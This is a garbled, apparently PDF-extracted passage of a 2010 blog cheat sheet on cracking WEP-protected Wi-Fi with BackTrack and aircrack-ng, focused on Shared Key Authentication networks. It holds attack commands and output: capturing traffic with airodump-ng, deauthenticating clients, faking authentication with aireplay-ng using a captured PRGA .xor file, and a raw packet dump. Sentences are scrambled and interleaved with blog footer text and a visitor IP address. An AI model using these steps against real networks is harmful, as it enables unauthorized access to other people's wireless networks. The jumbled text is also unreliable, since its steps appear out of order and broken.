......... do a re-associate (fake auth) and start sending packets again. .. All rights reserved.. Linux and Unix... aircrack-ng. and after a client has connected. When Shared Key is used. aireplay-ng --fakeauth will not just work… It will detect that Open System is cannot be used..3/20/2010 Source MAC 0x0000: 0x0010: 0x0020: 0x0040: = 00:1C:BF:90:5B:A3 Cheatsheet : Cracking WEP with Backtrack… 0841 ffff 94d4 5994 0201 0014 bf89 9cd3 001c bf90 5ba3 ffff ffff 8001 3c39 c800 a4b4 4b96 5258 fc95 766a fe90 6cd8 2f88 d317 1ab1 .xor file to disk.be:8800/…/cheatsheet‐cracking‐w… Tags: aircrack.xor -a 00:19:5B:52:AD:F7 ath1 No source MAC (-h) specified.vj. [ACK] Authentication 2/2 successful Sending Association Request [ACK] Association successful :-) (AID: 1) Hooray – from this point forward. Terms of Use are applicable to all content on this blog. containing the PRGA xor bits. © 2009. you can use the Shared Key to do fake auth. Of course.xor file : root@bt:/tmp# aireplay-ng -1 0 -e TestNet -y /tmp/filesout. aireplay-ng.K.A. you can try to deauthenticate an existing client (if any) If the .082 times..<9. it needs to see a client successfully authenticate to the AP before it will be able to grab the SKA and use it. Shared Key Authentication instead of OPEN What if the AP does not use OPEN authentication.l.. you can use the same techniques as explained in the first 2 scenario’s Note : if the number of Packets stops increasing. launch airodump-ng and write all data to disk (airodump-ng –w /tmp/filesout ath1) When a client authenticates.. (Visited 17.. if it takes too long before a client authenticates../. In fact. but uses Shared Key Authentication ? Well. wait a couple of minutes and start cracking Scenario 3 : WEP encryption. 12/14 . Using the device MAC (00:1C:BF:90:5B:A3) 20:23:58 Waiting for beacon frame (BSSID: 00:19:5B:52:AD:F7) on channel 10 20:23:58 20:23:58 20:23:58 20:23:58 20:23:58 20:23:58 Sending Authentication Request (Shared Key) [ACK] Authentication 1/2 successful Sending encrypted challenge. Networking | corelan. Use this packet ? y Verify that the number of #Data packets increases fast.. . you can attempt to do the fake auth by providing the .. If you want to use/reuse parts of the content on this blog. 124 visits today) Posted in 001_Security. Y. the column will state SKA. 20:15:01 20:15:01 Sending Authentication Request (Open System) [ACK] Switching to shared key authentication As long as a client has not associated.. From that point forward..[... First. In most cases. Peter Van Eeckhoutte.RX. and will then attempt to get the shared key... you must provide a link to the original content on this blog. this will kick off the data packet increase again.. airodump-ng will write a . the AUTH column in airodump-ng will stay empty.xor file is saved on disk. just stop sending packets.

aircrack-ng and John The Ripper Backtrack 4 cheat sheet WPA TKIP cracked in a minute – time to move on to WPA2 Juniper ScreenOS : Active/Passive clustering Creating and installing lzm modules in Backtrack 2 Leave a comment You must be logged in to post a comment. SKA. packetforge-ng. wep.. wireless Related Posts: Cheatsheet : Cracking WPA2 PSK with Backtrack 4. « If you want to be the first to know about new posts/tools/tutorials on this blog.. arp. Peter says: » . Use the 'Subscribe to updates via email' link below (in the Stay posted section) » Your profile Change your profile/password Actions Register Log in Entries RSS Comments RSS WordPress. backtrack. OPN.org Stay posted Subscribe to updates via email Follow me on twitter Search this blog Search Last 5 search keywords : | juniper | windows vpn | route based site to site VPN | installing backtrack 4 pre final hard drive | cracking wep backtrack 4 | Top 10 search keywords : | crack wpa with backtrack 4 | free download backtrack 3 | cracking wep backtrack 4 | backtrack 4 password list | how to install password list in bt4 | basic command for juniper firewall | backtrack 3 WPA 2 PSK | dual wan juniper | installing backtrack 4 pre final hard drive | this network requires encryption be enabled | corelan. crack.3/20/2010 Cheatsheet : Cracking WEP with Backtrack… airodump. airodump-ng. then subscribe to the mailinglist.be:8800/…/cheatsheet‐cracking‐w… 13/14 .

corelan.corelan.be corelan. All Rights Reserved.be .120 seconds | www. Your IP address : 173.68. 1.249.3/20/2010 Cheatsheet : Cracking WEP with Backtrack… Categories Select Category  Terms of Use | Copyright © 2009 Peter Van Eeckhoutte´s Blog.174 | 118 queries.be:8800/…/cheatsheet‐cracking‐w… 14/14 .artemis.